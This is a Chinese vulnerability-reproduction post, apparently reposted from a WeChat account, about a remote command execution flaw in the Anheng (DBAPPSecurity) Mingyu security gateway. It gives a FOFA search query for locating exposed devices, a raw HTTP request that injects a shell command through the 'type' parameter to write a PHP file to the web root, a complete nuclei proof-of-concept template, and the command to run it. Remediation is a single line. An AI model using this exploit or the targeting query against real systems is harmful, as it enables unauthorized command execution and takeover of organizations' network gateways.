【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞

admin 2023年12月28日11:50:26评论74 views字数 2540阅读8分28秒阅读模式


使


福利:小编整理了大量电子书和护网常用工具,在文末免费获取。


01

漏洞名称



安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞


02


漏洞影响


安恒明御安全

【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞



03


漏洞描述


明御安全网关秉持安全可视、简单 有效的只理念,以资产为视角,构建全流程防御的下一代安全防护体系,并融合传统防火墙、入侵检测、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。明御安全网关aaa_portal_auth_config_reset接口处存在RCE漏洞,攻击者通过漏洞可以获取服务器权限。


04


FOFA搜索语句

title="明御安全网关"


【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞



05


漏洞复现


第一步,向靶场发送如下数据包

GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1Host: x.x.x.xx.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: close


第二步,查看生成的文件

http://x.x.x.x/astdfkhl.php

【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞

漏洞复现成功



06


nuclei poc


poc文件内容如下

id: dbapp-mingyu-aaa_portal_auth_config_reset-rce
info: name: 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞 author: fgz severity: critical description: 明御安全网关秉持安全可视、简单 有效的只理念,以资产为视角,构建全流程防御的下一代安全防护体系,并融合传统防火墙、入侵检测、入侵防御系统、防病毒网关、上网行为管控、VPN网关、威胁情报等安全模块于一体的智慧化安全网关。明御安全网关aaa_portal_auth_config_reset接口处存在RCE漏洞,攻击者通过漏洞可以获取服务器权限. metadata: max-request: 1 fofa-query: title="明御安全网关" verified: truevariables: file_name: "{{to_lower(rand_text_alpha(8))}}" file_content: "{{to_lower(rand_text_alpha(30))}}"requests: - raw: - |+ GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22{{file_content}}%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F{{file_name}}.php%0a HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close
- | GET /{{file_name}}.php HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Accept-Encoding: gzip
matchers: - type: dsl dsl: - "status_code_1 == 200 && status_code_2 == 200 && contains(body_2, '{{file_content}}')"

运行POC

nuclei.exe -t mypoc/安恒/dbapp-mingyu-aaa_portal_auth_config_reset-rce.yaml -u http://192.168.40.130:8080

【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞


07


修复建议


升级到最新版本。


08


原文始发于微信公众号(AI与网安):【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月28日11:50:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行漏洞https://cn-sec.com/archives/2342959.html

发表评论

匿名网友 填写信息